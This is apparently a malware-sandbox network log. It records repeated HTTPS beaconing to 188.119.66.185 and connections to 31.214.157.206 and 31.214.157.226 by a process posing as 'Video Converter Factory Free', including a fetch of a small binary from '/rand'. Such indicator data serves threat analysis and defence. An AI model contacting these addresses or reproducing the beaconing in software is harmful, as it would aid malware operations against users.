                                                                                                    Dec 16, 2024 13:43:48.111447096 CET49853443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:48.111490965 CET44349853188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:48.111519098 CET44349853188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:48.111541033 CET49853443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:48.111557961 CET49853443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:48.111684084 CET49853443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:48.111702919 CET44349853188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:48.229960918 CET49859443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:48.230015039 CET44349859188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:48.230076075 CET49859443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:48.230343103 CET49859443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:48.230356932 CET44349859188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:49.697443008 CET44349859188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:49.697566032 CET49859443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:49.698095083 CET49859443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:49.698105097 CET44349859188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:49.698260069 CET49859443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:49.698266029 CET44349859188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:50.385876894 CET44349859188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:50.385953903 CET49859443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:50.385957003 CET44349859188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:50.386001110 CET49859443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:50.392571926 CET49859443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:50.392590046 CET44349859188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:50.393446922 CET498652024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:43:50.513813972 CET20244986531.214.157.206192.168.2.9
                                                                                                    Dec 16, 2024 13:43:50.513967037 CET498652024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:43:50.513967037 CET498652024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:43:50.514022112 CET498652024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:43:50.620460987 CET49866443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:50.620515108 CET44349866188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:50.620604992 CET49866443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:50.620898008 CET49866443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:50.620918989 CET44349866188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:50.634021044 CET20244986531.214.157.206192.168.2.9
                                                                                                    Dec 16, 2024 13:43:50.680424929 CET20244986531.214.157.206192.168.2.9
                                                                                                    Dec 16, 2024 13:43:51.484430075 CET20244986531.214.157.206192.168.2.9
                                                                                                    Dec 16, 2024 13:43:51.484579086 CET498652024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:43:52.261512995 CET44349866188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:52.261583090 CET49866443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:52.262028933 CET49866443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:52.262046099 CET44349866188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:52.262362957 CET49866443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:52.262371063 CET44349866188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:52.952092886 CET44349866188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:52.952155113 CET49866443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:52.952167034 CET44349866188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:52.952210903 CET49866443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:52.952435017 CET49866443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:52.952455997 CET44349866188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:53.073301077 CET49872443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:53.073348045 CET44349872188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:53.073486090 CET49872443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:53.073690891 CET49872443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:53.073698044 CET44349872188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:54.538887978 CET44349872188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:54.538964033 CET49872443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:54.539633036 CET49872443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:54.539648056 CET44349872188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:54.539673090 CET49872443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:54.539680004 CET44349872188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:55.228497028 CET44349872188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:55.228555918 CET49872443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:55.228564024 CET44349872188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:55.228581905 CET44349872188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:55.228598118 CET49872443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:55.228616953 CET49872443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:55.228940010 CET49872443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:55.228952885 CET44349872188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:55.339359999 CET49878443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:55.339418888 CET44349878188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:55.339503050 CET49878443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:55.339777946 CET49878443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:55.339791059 CET44349878188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:56.816800117 CET44349878188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:56.816929102 CET49878443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:56.817517996 CET49878443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:56.817531109 CET44349878188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:56.817682028 CET49878443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:56.817686081 CET44349878188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:57.515036106 CET44349878188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:57.515130043 CET44349878188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:57.515232086 CET49878443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:57.515393972 CET49878443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:57.515414000 CET44349878188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:57.636512995 CET49884443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:57.636571884 CET44349884188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:57.636646032 CET49884443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:57.636888981 CET49884443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:57.636905909 CET44349884188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:59.097292900 CET44349884188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:59.097392082 CET49884443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:59.097959042 CET49884443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:59.097970963 CET44349884188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:59.098115921 CET49884443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:59.098120928 CET44349884188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:59.804796934 CET44349884188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:59.804864883 CET44349884188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:59.805028915 CET49884443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:59.805238008 CET49884443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:59.805264950 CET44349884188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:59.916940928 CET49890443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:59.916975021 CET44349890188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:59.917048931 CET49890443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:59.917325020 CET49890443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:59.917332888 CET44349890188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:01.369452953 CET44349890188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:01.369550943 CET49890443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:01.370129108 CET49890443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:01.370135069 CET44349890188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:01.370317936 CET49890443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:01.370323896 CET44349890188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:02.052407980 CET44349890188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:02.052495956 CET44349890188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:02.052639008 CET49890443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:02.052639008 CET49890443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:02.052967072 CET49890443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:02.052979946 CET44349890188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:02.167363882 CET49896443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:02.167422056 CET44349896188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:02.167526960 CET49896443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:02.167854071 CET49896443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:02.167869091 CET44349896188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:03.811048985 CET44349896188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:03.811177015 CET49896443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:03.834969997 CET49896443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:03.834980965 CET44349896188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:03.835000038 CET49896443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:03.835004091 CET44349896188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:04.540890932 CET44349896188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:04.540954113 CET44349896188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:04.540958881 CET49896443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:04.540998936 CET49896443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:04.541260004 CET49896443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:04.541281939 CET44349896188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:04.651663065 CET49902443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:04.651714087 CET44349902188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:04.651779890 CET49902443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:04.652014017 CET49902443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:04.652028084 CET44349902188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:06.110436916 CET44349902188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:06.110517979 CET49902443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:06.110995054 CET49902443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:06.111006021 CET44349902188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:06.111193895 CET49902443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:06.111198902 CET44349902188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:06.799407005 CET44349902188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:06.799488068 CET44349902188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:06.799520016 CET49902443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:06.799541950 CET49902443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:06.799885988 CET49902443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:06.799902916 CET44349902188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:06.917823076 CET49908443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:06.917912006 CET44349908188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:06.918000937 CET49908443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:06.918279886 CET49908443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:06.918301105 CET44349908188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:08.367949963 CET44349908188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:08.368016005 CET49908443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:08.368482113 CET49908443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:37.226978064 CET498432024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:44:37.305299997 CET804999131.214.157.226192.168.2.9
                                                                                                    Dec 16, 2024 13:44:37.305398941 CET4999180192.168.2.931.214.157.226
                                                                                                    Dec 16, 2024 13:44:37.305725098 CET499922024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:44:37.425816059 CET20244999231.214.157.206192.168.2.9
                                                                                                    Dec 16, 2024 13:44:37.425929070 CET499922024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:44:37.425995111 CET499922024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:44:37.521224976 CET44349985188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:37.521306992 CET44349985188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:37.521307945 CET49985443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:37.521390915 CET49985443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:37.521646023 CET49985443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:37.521660089 CET44349985188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:37.546401024 CET20244999231.214.157.206192.168.2.9
                                                                                                    Dec 16, 2024 13:44:37.546530008 CET499922024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:44:37.635828018 CET49994443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:37.635883093 CET44349994188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:37.636029005 CET49994443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:37.636236906 CET49994443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:37.636255980 CET44349994188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:37.667071104 CET20244999231.214.157.206192.168.2.9
                                                                                                    Dec 16, 2024 13:44:38.670362949 CET20244999231.214.157.206192.168.2.9
                                                                                                    Dec 16, 2024 13:44:38.670474052 CET4999180192.168.2.931.214.157.226
                                                                                                    Dec 16, 2024 13:44:38.711379051 CET499922024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:44:38.790433884 CET804999131.214.157.226192.168.2.9
                                                                                                    Dec 16, 2024 13:44:39.062680006 CET804999131.214.157.226192.168.2.9
                                                                                                    Dec 16, 2024 13:44:39.062845945 CET499922024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:44:39.100356102 CET44349994188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:39.100474119 CET49994443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:39.118372917 CET4999180192.168.2.931.214.157.226
                                                                                                    Dec 16, 2024 13:44:39.153635025 CET49994443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:39.153665066 CET44349994188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:39.153795004 CET49994443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:39.153801918 CET44349994188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:39.182830095 CET20244999231.214.157.206192.168.2.9
                                                                                                    Dec 16, 2024 13:44:39.456437111 CET20244999231.214.157.206192.168.2.9
                                                                                                    Dec 16, 2024 13:44:39.456501007 CET499922024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:44:39.456567049 CET499922024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:44:39.456597090 CET4999180192.168.2.931.214.157.226
                                                                                                    Dec 16, 2024 13:44:39.576782942 CET20244999231.214.157.206192.168.2.9
                                                                                                    Dec 16, 2024 13:44:39.577256918 CET804999131.214.157.226192.168.2.9
                                                                                                    Dec 16, 2024 13:44:39.577414989 CET4999180192.168.2.931.214.157.226
                                                                                                    Dec 16, 2024 13:44:39.786972046 CET44349994188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:39.787058115 CET49994443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:39.787075996 CET44349994188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:39.787131071 CET49994443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:39.787328005 CET49994443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:39.787343979 CET44349994188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:39.901293993 CET50000443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:39.901370049 CET44350000188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:39.901458979 CET50000443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:39.901743889 CET50000443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:39.901773930 CET44350000188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:41.353863955 CET44350000188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:41.353931904 CET50000443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:41.355142117 CET50000443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:41.355156898 CET44350000188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:41.355472088 CET50000443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:41.355479002 CET44350000188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:42.040059090 CET44350000188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:42.040136099 CET44350000188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:42.040256977 CET50000443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:42.040256977 CET50000443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:42.057773113 CET50000443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:42.057830095 CET44350000188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:42.198407888 CET50002443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:42.198468924 CET44350002188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:42.198563099 CET50002443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:42.198779106 CET50002443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:42.198796988 CET44350002188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:43.662384987 CET44350002188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:43.662473917 CET50002443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:43.662930012 CET50002443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:43.662940979 CET44350002188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:43.665168047 CET50002443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:43.665180922 CET44350002188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:44.345310926 CET44350002188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:44.345415115 CET50002443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:44.345443010 CET44350002188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:44.345488071 CET44350002188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:44.345550060 CET50002443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:44.348609924 CET50002443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:44.348628998 CET44350002188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:44.475023985 CET50003443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:44.475069046 CET44350003188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:44.475143909 CET50003443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:44.475425005 CET50003443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:44.475435019 CET44350003188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:46.115912914 CET44350003188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:46.116003990 CET50003443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:46.116755009 CET50003443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:46.116763115 CET44350003188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:46.119194031 CET50003443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:46.119199991 CET44350003188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:46.802892923 CET44350003188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:46.803006887 CET44350003188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:46.803041935 CET50003443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:46.803212881 CET50003443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:46.803338051 CET50003443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:46.803356886 CET44350003188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:46.936790943 CET50004443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:46.936839104 CET44350004188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:46.936964035 CET50004443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:46.937262058 CET50004443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:46.937278032 CET44350004188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:48.399137020 CET44350004188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:48.405797005 CET50004443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:48.502275944 CET50004443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:48.502294064 CET44350004188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:48.510812044 CET50004443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:48.510822058 CET44350004188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:49.097865105 CET44350004188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:49.098057032 CET44350004188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:49.098162889 CET50004443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:49.099323034 CET50004443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:49.099339008 CET44350004188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:49.247836113 CET50005443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:49.247886896 CET44350005188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:49.248028040 CET50005443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:49.248197079 CET50005443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:49.248212099 CET44350005188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:50.704742908 CET44350005188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:50.705287933 CET50005443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:50.705840111 CET50005443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:50.705851078 CET44350005188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:50.708163977 CET50005443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:50.708169937 CET44350005188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:51.413052082 CET44350005188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:51.413142920 CET44350005188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:51.413172007 CET50005443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:51.413197041 CET50005443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:51.413404942 CET50005443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:51.413427114 CET44350005188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:51.532763958 CET50006443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:51.532819986 CET44350006188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:51.532893896 CET50006443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:51.533390999 CET50006443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:51.533406019 CET44350006188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:53.179347038 CET44350006188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:53.179425955 CET50006443192.168.2.9188.119.66.185
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 16, 2024 13:42:41.373579979 CET | 1.1.1.1 | 192.168.2.9 | 0x2249 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 16, 2024 13:42:41.373579979 CET | 1.1.1.1 | 192.168.2.9 | 0x2249 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
• 188.119.66.185
• 31.214.157.226
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49992 | 31.214.157.206 | 2024 | 7880 | C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 13:44:38.670362949 CET | 57 | IN | GET /rand HTTP/1.1
Host: 31.214.157.226
Accept: */*
Dec 16, 2024 13:44:39.062845945 CET | 765 | OUT | HTTP/1.1 200 OK
Server: nginx/1.27.0
Date: Mon, 16 Dec 2024 12:44:38 GMT
Content-Type: application/octet-stream
Content-Length: 512
Last-Modified: Fri, 02 Aug 2024 10:35:15 GMT
Connection: keep-alive
ETag: "66acb663-200"
Accept-Ranges: bytes
